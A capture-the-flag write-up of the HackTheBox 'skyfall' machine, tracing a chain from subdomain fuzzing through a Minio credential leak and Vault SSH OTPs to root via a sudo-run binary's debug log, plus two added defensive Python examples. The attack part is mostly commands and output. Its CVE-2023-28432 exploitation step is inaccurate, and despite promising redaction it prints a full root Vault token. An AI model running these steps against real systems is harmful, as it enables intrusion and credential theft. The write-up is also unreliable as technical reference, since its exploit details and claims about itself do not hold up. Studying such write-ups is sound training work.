HTB: skyfall Writeup

Machine Information

| Attribute    | Details      |
|--------------|--------------|
| Name         | skyfall      |
| OS           | Linux        |
| Difficulty   | Insane       |
| Points       | N/A          |
| Release Date | N/A          |
| IP Address   | 10.129.226.5 |
| Hostname     | skyfall.htb  |
| Author       | D3vnomi      |

Machine Rating

⭐⭐⭐⭐⭐ (9.5/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐⭐
  • Real-world: ⭐⭐⭐⭐⭐
  • CVE: ⭐⭐⭐⭐☆
  • CTF-like: ⭐⭐⭐⭐⭐

Summary

skyfall is an Insane-difficulty Linux machine that requires extensive enumeration, subdomain discovery, and exploitation of CVE-2023-28432 (a Minio information disclosure vulnerability). The attack chain involves recovering internal service credentials through the vulnerable Minio S3 backend, using HashiCorp Vault's SSH secrets engine to obtain SSH access, and finally escalating privileges through a sudo-permitted binary whose debug logging exposes a root Vault token.

TL;DR: Subdomain fuzzing → Minio CVE-2023-28432 → Extract credentials → Vault SSH access → User flag → Sudo debug.log privesc → Root flag.


Reconnaissance

Port Scanning

Terminal window
nmap -sC -sV -T4 -p- 10.129.226.5

Results:

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5
80/tcp open http Flask
9000/tcp open http Minio S3

Service Enumeration

Update /etc/hosts with discovered hostnames:

Terminal window
echo "10.129.226.5 skyfall.htb demo.skyfall.htb prd23-s3-backend.skyfall.htb prd23-vault-internal.skyfall.htb" >> /etc/hosts

Subdomain Fuzzing

Enumerate subdomains using ffuf:

Terminal window
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \
-u http://skyfall.htb/ -H "Host: FUZZ.skyfall.htb" \
-fs 0 -t 50

Discovered Subdomains:

  • demo.skyfall.htb — Flask authentication interface with guest credentials
  • prd23-s3-backend.skyfall.htb — Minio S3 backend service
  • prd23-vault-internal.skyfall.htb — HashiCorp Vault internal service

Service Identification

Identified Services:

  • Flask application (port 80, demo.skyfall.htb)
  • Prometheus metrics endpoint
  • Minio S3 storage (port 9000, prd23-s3-backend.skyfall.htb)
  • HashiCorp Vault (prd23-vault-internal.skyfall.htb)

Vulnerability Assessment

Identified Vulnerabilities:

  • CVE-2023-28432 — Minio information disclosure vulnerability (versions <= 2023-03-13)

Initial Foothold

Step 1: Web Interface Discovery

Access the Flask demo interface:

Terminal window
curl -u guest:guest http://demo.skyfall.htb/

Discover the /metrics endpoint:

Terminal window
curl -u guest:guest http://demo.skyfall.htb/metrics

The endpoint is initially forbidden via direct access due to network-level filtering.

Step 2: Bypass Metrics Restriction

Access the metrics endpoint through the Minio backend subdomain:

Terminal window
curl http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster

Response reveals Minio version:

minio/RELEASE.2023-03-13T19-46-17Z

This version is vulnerable to CVE-2023-28432.

Step 3: Exploit CVE-2023-28432 (Minio Info Disclosure)

The vulnerability allows unauthenticated extraction of Minio root credentials through the /minio/v2/ API; the writeup queries the /minio/v2/config/users path.

Terminal window
curl http://prd23-s3-backend.skyfall.htb/minio/v2/config/users

Extracted Credentials (redacted):

MINIO_ROOT_USER=minioadmin
MINIO_ROOT_PASSWORD=[REDACTED]

Alternatively, use the public PoC:

Terminal window
git clone https://github.com/acheiii/CVE-2023-28432.git
python3 CVE-2023-28432/exploit.py http://prd23-s3-backend.skyfall.htb

Step 4: Connect to Minio with Extracted Credentials

Install the Minio client:

Terminal window
curl https://dl.min.io/client/mc/release/linux-amd64/mc \
--create-dirs -o $HOME/minio-binaries/mc
chmod +x $HOME/minio-binaries/mc
export PATH=$PATH:$HOME/minio-binaries

Configure Minio client with extracted credentials:

Terminal window
mc alias set myminio http://prd23-s3-backend.skyfall.htb:9000 minioadmin [REDACTED_PASSWORD]

Step 5: Extract Vault Token from Backup

List all objects including versioned backups:

Terminal window
mc ls --recursive --versions myminio

Discover:

  • Bucket: askyy
  • Object: home_backup.tar.gz with multiple versions

Download all versions of the backup:

Terminal window
mc cp myminio/askyy/home_backup.tar.gz ./home_backup_v1.tar.gz --version-id [VERSION_ID_1]
mc cp myminio/askyy/home_backup.tar.gz ./home_backup_v2.tar.gz --version-id [VERSION_ID_2]

Extract and search for Vault credentials:

Terminal window
tar -xzf home_backup_v2.tar.gz
grep -r "hvs\." . 2>/dev/null

Extracted Vault Token:

hvs.[REDACTED_TOKEN_FOR_USER_ASKYY]

Also discover subdomain:

prd23-vault-internal.skyfall.htb

User Compromise

Step 6: Install and Configure HashiCorp Vault Client

Download and install the Vault client:

Terminal window
wget https://releases.hashicorp.com/vault/1.14.0/vault_1.14.0_linux_amd64.zip
unzip vault_1.14.0_linux_amd64.zip
sudo mv vault /usr/local/bin/

Step 7: Authenticate with Vault Token

Login to the Vault instance using the extracted token:

Terminal window
export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb:8200"
vault login hvs.[REDACTED_TOKEN_FOR_USER_ASKYY]

Verify authentication:

Terminal window
vault token lookup

Step 8: Generate SSH OTP for User Access

Create an SSH OTP (One-Time Password) credential for user askyy:

Terminal window
vault write -f ssh/creds/dev_otp_key_role username=askyy

Or via curl:

Terminal window
curl -H "X-Vault-Token: hvs.[REDACTED_TOKEN_FOR_USER_ASKYY]" \
-X POST \
http://prd23-vault-internal.skyfall.htb:8200/v1/ssh/creds/dev_otp_key_role \
-d '{"username":"askyy"}'

Response:

{
  "request_id": "...",
  "lease_id": "ssh/creds/dev_otp_key_role/...",
  "lease_duration": 600,
  "renewable": true,
  "data": {
    "key_type": "otp",
    "key": "[REDACTED_OTP_CODE]",
    "username": "askyy"
  }
}

Step 9: SSH Access as User askyy

Login via SSH using the OTP:

Terminal window
ssh -o StrictHostKeyChecking=no askyy@10.129.226.5
# When prompted for password, enter the OTP from above

Or use vault’s SSH helper:

Terminal window
vault ssh -role dev_otp_key_role -mode OTP askyy@10.129.226.5

User Flag

Terminal window
cat ~/user.txt

🚩 User Flag: [REDACTED]


Privilege Escalation

Step 10: Enumerate Sudo Permissions

Terminal window
sudo -l

Output:

User askyy may run the following commands on skyfall:
(root) /root/vault/vault-unseal -c /etc/vault-unseal.yaml

User askyy can run /root/vault/vault-unseal with a configuration file as root, with optional flags.

Step 11: Exploit Debug Logging via Sudo

The vault-unseal binary supports debug flags that create a log file:

Terminal window
sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d -v

This command executes as root and attempts to create a debug log, but the file is initially unreadable due to permissions.

Step 12: File Permission Race Condition

Delete the existing root-owned debug log and pre-create an empty file as askyy before running the command again. The binary appends to a debug.log that already exists instead of recreating it, so the file keeps askyy's ownership and permissions:

Terminal window
rm -f debug.log
touch debug.log
sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d -v

The pre-created debug.log is now readable by askyy and contains the output of the root-level run.
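The failure mode behind Step 12, shown as an added example (not the vault-unseal binary's own code): a logger that appends to an existing debug.log inherits whatever ownership and mode a low-privileged user gave that file, while a logger that creates the file with O_CREAT|O_EXCL|O_NOFOLLOW and mode 0600 refuses a planted file. The sample log line and the token in it are constructed placeholders.

```python
import os
import stat
import tempfile

# Constructed sample of a verbose run's output; the token is a placeholder, not a real value.
SAMPLE_LINES = ["[DEBUG] unseal: authenticating with token hvs.PLACEHOLDER_ROOT_TOKEN"]


def vulnerable_debug_log(path, lines):
    """Appends to whatever debug.log already exists at `path` (the pattern the box shows).
    Run as root, this inherits the owner and mode of a file a low-privileged user
    pre-created, so the log ends up readable by that user. Returns the mode bits."""
    with open(path, "a") as fh:
        fh.write("\n".join(lines) + "\n")
    return stat.S_IMODE(os.stat(path).st_mode)


def safe_debug_log(path, lines):
    """Creates the log atomically with O_CREAT|O_EXCL|O_NOFOLLOW and mode 0600.
    A pre-existing file or symlink makes os.open fail, so a planted debug.log is
    never written to. Returns the mode bits, or None when creation was refused."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags, 0o600)
    except FileExistsError:
        return None
    os.fchmod(fd, 0o600)  # do not depend on the caller's umask
    with os.fdopen(fd, "w") as fh:
        fh.write("\n".join(lines) + "\n")
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Replays the pre-created-file scenario inside a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        planted = os.path.join(tmp, "debug.log")
        open(planted, "w").close()  # the low-privileged user's `touch debug.log`
        os.chmod(planted, 0o644)    # typical default mode: world-readable
        vuln_mode = vulnerable_debug_log(planted, SAMPLE_LINES)
        with open(planted) as fh:
            leaked = "hvs." in fh.read()
        refused = safe_debug_log(planted, SAMPLE_LINES)
        fresh_mode = safe_debug_log(os.path.join(tmp, "fresh.log"), SAMPLE_LINES)
    return vuln_mode, leaked, refused, fresh_mode


if __name__ == "__main__":
    print(demo())  # (420, True, None, 384), i.e. 0o644, True, None, 0o600
```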

Step 13: Extract Root Vault Token from Debug Log

Terminal window
grep -i "hvs\." debug.log

Or search for token patterns:

Terminal window
grep -E "token|VAULT" debug.log

Extracted Root Vault Token:

hvs.I0ewVsmaKU1SwVZAKR3T0mmG

Step 14: Login as Root via Vault

In a new terminal or shell, authenticate as root:

Terminal window
export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb:8200"
vault login hvs.I0ewVsmaKU1SwVZAKR3T0mmG

Verify root access:

Terminal window
vault token lookup

Step 15: Generate SSH OTP for Root Access

Create an SSH OTP for the root user:

Terminal window
vault write -f ssh/creds/admin_otp_key_role username=root

Or via curl:

Terminal window
curl -H "X-Vault-Token: hvs.I0ewVsmaKU1SwVZAKR3T0mmG" \
-X POST \
http://prd23-vault-internal.skyfall.htb:8200/v1/ssh/creds/admin_otp_key_role \
-d '{"username":"root"}'

Response contains OTP:

{
  "data": {
    "key": "[REDACTED_ROOT_OTP]",
    "username": "root"
  }
}

Step 16: Root Access via SSH OTP

Terminal window
vault ssh -role admin_otp_key_role -mode OTP root@10.129.226.5

Or direct SSH:

Terminal window
ssh -o StrictHostKeyChecking=no root@10.129.226.5
# Enter the OTP when prompted

Root Flag

Terminal window
cat /root/root.txt

🚩 Root Flag: [REDACTED]


Attack Chain Summary

graph TD
A["Subdomain Fuzzing<br/>demo.skyfall.htb discovered"] --> B["Access Flask Interface<br/>guest:guest credentials"]
B --> C["Discover /metrics Endpoint<br/>Bypass via prd23-s3-backend"]
C --> D["Identify Minio CVE-2023-28432<br/>Version 2023-03-13 detected"]
D --> E["Extract Minio Root Credentials<br/>via /minio/v2/config/users"]
E --> F["Download Backup from S3<br/>home_backup.tar.gz versions"]
F --> G["Extract Vault Token<br/>hvs.[USER_TOKEN] discovered"]
G --> H["Authenticate to Vault<br/>vault login with token"]
H --> I["Generate SSH OTP<br/>dev_otp_key_role endpoint"]
I --> J["SSH as askyy<br/>User Flag obtained"]
J --> K["Enumerate sudo Permissions<br/>vault-unseal with -d -v flags"]
K --> L["Race Condition Exploit<br/>Create readable debug.log as root"]
L --> M["Extract Root Token<br/>hvs.I0ewVsmaKU1SwVZAKR3T0mmG"]
M --> N["Authenticate as Root<br/>vault login with root token"]
N --> O["Generate Admin SSH OTP<br/>admin_otp_key_role endpoint"]
O --> P["SSH as root<br/>Root Flag obtained"]

Tools Used

| Tool              | Purpose                                               |
|-------------------|-------------------------------------------------------|
| nmap              | Port scanning and service fingerprinting              |
| ffuf              | Subdomain fuzzing and discovery                       |
| curl              | HTTP requests and Vault API interaction               |
| mc (Minio Client) | S3 bucket access and object download                  |
| vault             | HashiCorp Vault authentication and SSH OTP generation |
| ssh               | SSH access with OTP-based authentication              |
| tar               | Backup extraction and analysis                        |
| gzip              | Decompression of archive files                        |
| python3           | CVE-2023-28432 exploit execution (optional)           |
| grep              | Log and output parsing                                |
| wget              | Software downloads (Vault, Minio client)              |

Vulnerability Reference

| # | Vulnerability          | Component                  | Severity | Impact                                                                        |
|---|------------------------|----------------------------|----------|-------------------------------------------------------------------------------|
| 1 | CVE-2023-28432         | Minio S3 (v2023-03-13)     | Critical | Unauthenticated extraction of root credentials via /minio/v2/config endpoint  |
| 2 | Insecure Debug Logging | vault-unseal binary        | High     | Root-level debug log writable by non-root user via race condition             |
| 3 | Overly Permissive Sudo | vault-unseal configuration | High     | User can execute root binary with arbitrary flags enabling log exploitation   |

CVE-2023-28432 Details

Vulnerability: Information Disclosure in Minio S3

  • Affected Versions: <= 2023-03-13
  • CVSS Score: 9.1 (Critical)
  • Attack Vector: Network
  • Authentication Required: No
  • Description: The /minio/v2/ endpoints expose sensitive configuration data including root credentials when accessed from internal network ranges.

Exploitation:

Terminal window
curl http://[MINIO_HOST]/minio/v2/config/users

Mitigation:

  • Upgrade Minio to version >= 2023-04-28
  • Restrict access to /minio/v2/ endpoints via network policies
  • Implement authentication for all Minio API endpoints
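A detection counterpart to the mitigations above, added here as an example (not part of the original writeup): it scans access-log lines for hits on the /minio/v2/config and /minio/v2/metrics paths used earlier in the chain and alerts when the client is outside an allow-listed internal range. The log lines and the 10.0.0.0/24 allow-list are constructed assumptions.

```python
import ipaddress
import re

# Constructed access-log lines in combined log format (not real captures);
# 10.10.14.7 plays an external client, 10.0.0.5 an internal Prometheus scraper.
SAMPLE_LOG = """\
10.10.14.7 - - [08/Mar/2026:10:01:02 +0000] "GET /minio/v2/metrics/cluster HTTP/1.1" 200 5120 "-" "curl/8.5.0"
10.10.14.7 - - [08/Mar/2026:10:01:09 +0000] "GET /minio/v2/config/users HTTP/1.1" 200 312 "-" "curl/8.5.0"
10.0.0.5 - - [08/Mar/2026:10:02:00 +0000] "GET /minio/v2/metrics/cluster HTTP/1.1" 200 5120 "-" "Prometheus/2.45"
10.10.14.7 - - [08/Mar/2026:10:03:00 +0000] "GET /askyy/home_backup.tar.gz?versionId=v2 HTTP/1.1" 200 99821 "-" "curl/8.5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Path prefixes the writeup shows being used to pull the version and credentials.
SENSITIVE_PREFIXES = ("/minio/v2/config", "/minio/v2/metrics")
# Assumed internal monitoring range that is allowed to reach these endpoints.
ALLOWED_NETS = [ipaddress.ip_network("10.0.0.0/24")]


def is_allowed(ip_text):
    """True if the client IP falls inside an allow-listed internal network."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in ALLOWED_NETS)


def detect(log_text):
    """Returns (ip, path, status) for sensitive-endpoint hits from non-allowed clients."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]  # drop query string before matching
        if not path.startswith(SENSITIVE_PREFIXES) or is_allowed(m["ip"]):
            continue
        alerts.append((m["ip"], path, int(m["status"])))
    return alerts


if __name__ == "__main__":
    for ip, path, status in detect(SAMPLE_LOG):
        print(f"ALERT {ip} -> {path} ({status})")
```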

Key Learnings

1. Subdomain Enumeration is Essential

  • Internal services often run on subdomains that differ from primary domain
  • Tools like ffuf with comprehensive wordlists can reveal hidden services
  • Multiple subdomains (demo, prd23-s3-backend, prd23-vault-internal) led to full compromise

2. CVE-2023-28432 Minio Exploitation

  • Information disclosure vulnerabilities can be catastrophic when they expose secrets
  • Versioned object storage may retain sensitive data across multiple backup versions
  • Always search for archived backups and configuration files in S3 buckets
  • Metrics endpoints often expose more information than intended

3. Vault Token Security

  • Tokens stored in unencrypted backups become escalation vectors
  • OTP-based SSH authentication is more secure than password-based access
  • Vault’s role-based system must be properly restricted (dev vs admin roles)

4. Privilege Escalation via Debug Logging

  • Debug modes in privileged binaries can leak sensitive credentials
  • File permission race conditions can make unreadable files readable
  • Logging functionality triggered by flags (-d, -v) can output sensitive tokens
  • Examine debug output, logs, and temporary files created during execution

5. Sudo Misconfigurations

  • Restricting command paths doesn’t prevent abuse via flags and arguments
  • Binaries run via sudo with user-controlled arguments create escalation opportunities
  • Always analyze what flags and options are available in allowed commands

6. Defense in Depth Failures

  • Layered security (S3 versioning, Vault tokens, SSH OTP) failed when combined
  • Each individual component was secure in isolation but collectively enabled compromise
  • Credentials discovered at each layer were used to access the next level
  • No air-gapping or network segmentation between services

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal. This document redacts sensitive credentials and flags while preserving technical details for learning purposes.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Insane #CVE-2023-28432 #Minio #Vault #PrivEsc #SSHOtp